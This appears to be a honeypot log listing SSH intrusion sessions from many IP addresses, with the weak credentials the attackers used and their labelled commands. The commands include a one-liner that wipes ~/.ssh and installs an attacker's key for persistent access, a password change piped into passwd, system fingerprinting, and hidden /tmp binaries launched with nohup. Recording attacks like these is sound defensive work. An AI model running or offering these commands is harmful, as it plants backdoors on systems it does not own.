$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ ironclad_rendang_root (182.253.168.47) โ€” Jakarta, Indonesia ยท 1 session ยท 2 cmds
2026-05-07 01:43 EDT ยท as oracle/welcome1
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ haywire_bamboo_root_120 (103.69.96.120) โ€” Bรบt Sฦกn, Vietnam ยท 2 sessions ยท 4 cmds
2026-05-07 00:39 EDT ยท as oracle/Huawei@123, oracle/Password
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
๐ŸŽญ rogue_jade_root (106.14.183.112) โ€” Shanghai, China ยท 70 sessions ยท 70 cmds
2026-05-06 23:10 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—70
๐ŸŽญ nocturnal_eagle_root_94 (209.137.181.94) โ€” Los Angeles, United States ยท 1 session ยท 1 cmd
2026-05-07 00:08 EDT ยท as deploy/deploy
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ molten_tiger_root (106.51.92.114) โ€” Bengaluru, India ยท 1 session ยท 2 cmds
2026-05-07 00:05 EDT ยท as oracle/oracle123!@#
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ derelict_k-pop_root (59.17.95.129) โ€” Yeonsu-gu, South Korea ยท 1 session ยท 2 cmds
2026-05-07 00:04 EDT ยท as oracle/oracle123!@#
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ midnight_dragon_root_77 (39.105.133.77) โ€” Beijing, China ยท 1 session ยท 1 cmd
2026-05-06 23:50 EDT ยท as oracle/Oracle1
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ unhinged_dragon_root (47.96.250.105) โ€” Hangzhou, China ยท 1 session ยท 1 cmd
2026-05-06 21:53 EDT ยท as pi/pi
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ wired_void_root (190.167.237.191) โ€” Santiago de los Caballeros, Dominican Republic ยท 1 session ยท 2 cmds
2026-05-06 21:22 EDT ยท as oracle/1111
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ rogue_taco_root (186.96.151.198) โ€” Mexico City, Mexico ยท 3 sessions ยท 6 cmds
2026-05-06 20:46 EDT ยท as oracle/123root123, oracle/a, oracle/or@cle
file attribute tampering โ†’ SSH key persistence (repeated file attribute tampering 3x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—3
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—3
โ†ณ SSH key persistence
๐ŸŽญ wired_burger_root_212 (209.141.41.212) โ€” Las Vegas, United States ยท 1 session ยท 20 cmds
2026-05-06 20:24 EDT ยท as postgres/postgres
cd ~; chattr -ia .ssh; lockr -ia .ssh โ†’ cd ~ && rm -rf .ssh && mkdir .ssh โ†’ echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7Vv... โ†’ cat /proc/cpuinfo | grep name | wc
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "postgres\nuQ6bkcLqrzS7\nuQ6bkcLqrzS7"|passwd|bash
$ Enter new UNIX password:
$ echo "postgres\nuQ6bkcLqrzS7\nuQ6bkcLqrzS7\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ listless_lantern (183.60.172.37) โ€” Guangzhou, China ยท 1 session ยท 1 cmd
2026-05-06 19:31 EDT ยท as guest/guest
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ brisk_wraith_root (95.216.3.67) โ€” Helsinki, Finland ยท 8 sessions ยท 8 cmds
2026-05-06 19:17 EDT ยท as root/123456, root/password, root/root
make executable
$ nohup /tmp/.sorry_KwpRhZl0 >/tmp/.sorry_8JoWIbaM.log 2>&1 &
$ chmod +x /tmp/.sorry_KwpRhZl0
โ†ณ make executable
$ nohup /tmp/.sorry_3oHNtdTF >/tmp/.sorry_do8bp3kc.log 2>&1 &
$ chmod +x /tmp/.sorry_3oHNtdTF
โ†ณ make executable
$ nohup /tmp/.sorry_XpaqH5hR >/tmp/.sorry_p7Q4taNm.log 2>&1 &
$ chmod +x /tmp/.sorry_XpaqH5hR
โ†ณ make executable
$ nohup /tmp/.sorry_icXbXNM2 >/tmp/.sorry_BQVhnGfD.log 2>&1 &
$ chmod +x /tmp/.sorry_icXbXNM2
โ†ณ make executable
๐ŸŽญ sneaky_durian_root_158 (45.78.198.158) โ€” Singapore, Singapore ยท 1 session ยท 2 cmds
2026-05-06 18:24 EDT ยท as oracle/oracle@12345
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence